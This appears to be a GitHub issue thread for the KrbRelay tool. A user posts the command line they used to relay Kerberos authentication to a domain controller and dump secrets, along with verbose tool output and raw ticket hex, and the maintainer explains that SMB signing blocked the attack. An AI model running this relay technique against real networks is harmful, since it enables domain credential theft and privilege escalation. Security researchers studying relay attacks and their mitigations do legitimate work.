Could not bind to SCMR, Could not start remoteregistry error

Question

Could not bind to SCMR, Could not start remoteregistry error

C0mebreathe opened this issue 2 years ago · comments

WIndows 10 21H1

KrbRelay.exe -spn cifs/dc1.dunder.local -session 2 -clsid 0289a7c5-91bf-4547-81ae-fec91a89dec5 -secrets
[-] WARNING, user's session is not active
[] Relaying context: DUNDER\administrator
[] Rewriting function table
[] Rewriting PEB
[] GetModuleFileName: System
[] Init com server
[] GetModuleFileName: c:\Tools\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAADb8cNatMyOMDaCuZf4PPz4AswAALwj//+DFoH/URXSiyIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[] Forcing cross-session authentication
[] Using CLSID: 0289a7c5-91bf-4547-81ae-fec91a89dec5
[] Spawning in session 2
[] apReq: 6082066806092a864886f71201020201006e82065730820653a003020105a10302010ea20703050020000000a382048f6182048b30820487a003020105a10e1b0c44554e4445522e4c4f43414ca2233021a003020102a11a30181b04636966731b106463312e64756e6465722e6c6f63616ca382044930820445a003020112a103020108a282043704820433124bd2df68f672cb9397dc22d18578a52b55f2d7593ab32de9f3d04bb53e4e85dde80293bf6d8052eed9ebd0e6c94652e429245476941a63e1928113cd5a6ac57b7077ce94cb1b5001f896bac7ebe351979cc244c150185cadf9cfb2b7b1c6310e13710655b8004d72d98ad12e1474c5cdfa0bd181df8be5aca5fa35e772e52cc2992ea9e845e6d5797d8fa9f410d3b9b89f13e39f8b0e4ee65a4bc8af5b00754d1a7972bd7c00c2692a0dcb6ca41c426ba1f8ff5205c2e6b0d45b921fe6e932bc33c4d96468b3b4acee2fa18779c9147d4764410f76893bb3fa66f479b30785e629713d3df68bcc9d0a055a731efe15bee36286855f3031a1713e476ac52edbb6608535e96baefa05090af610b9077bfe9cc4f8a5713ee0a8b773ae4f917fc293034d98faec25657cc8be23016e76cd335c107f4eaadab6985882e739f2ec08c4379a242fd19d13af08202e31ca2afd35896fcfe95afec08dde7cdced7a5a7d005d4718c15a525609fa624b99e226b839864fcb45eaf09aa23f3cebaefb833d27bce403e1c9755238e6ab52d9667e0b025137ef545f1b27f7ddaa5ed9d258caaf7224aee76b676bd3c8a6eb8c7ab6084392602202144f67d6e0e2338e878f587de469132da32c49a8c03ffc41dede0364e6efab1e62005033b90437f81b14fcbf98ea793f630b5b856e92c6e39fd1ae3d183ef5b26f09ae804a223d69bba48c228e30697dd0fa6ccc4e16fa85d292e8739c82b45ba438edd7a49a254398146536f8f479769de7056d00c99bf90e892b455f4c85d3f3b5af1eb08988c2c73c99ab628c8dfb537157b8f2b8a42a5ee9e2d089c84db24baf24f1666b72ecd7b36f601e01b1ac98c93fa09e62a12fcdb7ecde0c20c2172275357b22d3c016f26721ca4fc1a6f7646bba765c1abce8f99c44945fba8134cb46c89d7e129c72af863cb41900f760aa9d25c549455fe7a6828c0a6b84f06932eeddd4af95ee8e6f20b8e2d5fc477a00186eb5c7b008898797ea7031facad84c7c7ceb0a4fb55adc5c548e87ef2183834650e65d8df3dbc945fdd01cd296db9393d651869b73669a309d9fe078dcc95357f39b710ef3309a311b1e53f84e814946b0a5818eff393cb349423c6a486bf9423a927e823f492b6cc8d13a12757d5f39370357f0f0eda0ad7b11a419b12edf04b1bd772646d42a25d4340574dd1a4498da0882520ab8fc186609a94165e66127851b19d46df9426820fdce9324fc4a6d3bb94aecc13f5a16c0e9e137247d21ad91ed0e5b1caf67c7ad7b16bf5d79fcb7d63a3da88ceda8bbd91e6078cad8f15c3cc8e0919e10a5859bf8de3a6e33bbb40b4fd1a0989688481c7439a5cf061407eb4f9788f6977c05324e2de7b8e8dd8f935cbceeac50888fdb9e4c4ec724774759117a0d5d56b5e4091318783dc62b757792180e15cbb338bea242bd6233cd4b738d5593101fe1b96d2993ab928cd2cf69c7b7acebe53f328555973fa910d7cac84eef51b78d48799ca9aac3a48201a9308201a5a003020112a282019c04820198ddff883d2424ff75d9d60df2c5877456f0b8a4f32d94046bd49056f985d348aa7d06e1fefdf11d1ae3e5c93156f8213ff5b03b60e7593b9d7965044d58ea08eeb54c896ba62a9140c323e5c3898712d991a7445fdaaea4515c46f9fb9af4ccbcaaa9928d123c56454ec304861f019941357881f05e70d00130913e6b2e8016fce69fb58704c97a9fe267e83d5b405711c453606256919f6d7f2804362b88c1d385780d9ecb14602a362fb826011d4b957ea353021aa65bad2433ddf7709b10740e778ed65ee50efce92b0d4fbce514116863635518867b60cb0cb166043838dc6722c352151535edbff626097a9e004b0fd4d011fde5b4da09a68eafe2c9237840901a3dc39ac8bcbbfe7a346a36301fe4a74837206d17ad66cc4f3e6bcf1750d9f449ac586723e6cef8d00eadf7b9a2e9a41ad23b7cd76c722669c98837e9979c68da45762fdd01dbd1ccbeaad51f474211d3c76aa6f07a49aa546cb6ec5a2ad507414ca94c355d67c8bf119b4211b52c693680a05ee9a699dcdfc62a91a4631d24a5ab9587b08eb582d2d51cf1dffc05ee0701bdb57d7e
[] apRep1: 6f8187308184a003020105a10302010fa2783076a003020112a26f046d6b474d844cf745fae09c712f4ac2cdfb22bfd4176cc0fbe118c1890a869a6563e39a85fdb11c5bb9b448b06fb93199b286a249633db5322927c3391058a91ca9d2db858616b40276a81b3c679423c16454b6a5dd279211a2f2a049512c7706397f74641b30a534e972dcdbf0b7
[] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a24404421a1e218b1c01b28ce574f89327ee162a2e6270030f637460681b285af6bd7044cf25318164f3257102bca5f6724fd732b8fa3d64df3d54350b925485edd9a13239fb
[+] SMB session established
[-] Could not bind to SCMR
[-] Could not start remoteregistry

cube0x0 · Answer 1 · Wed Feb 16 2022 21:36:37 GMT+0800 (China Standard Time)

You have SMB signing is enabled which prevents relaying attacks :p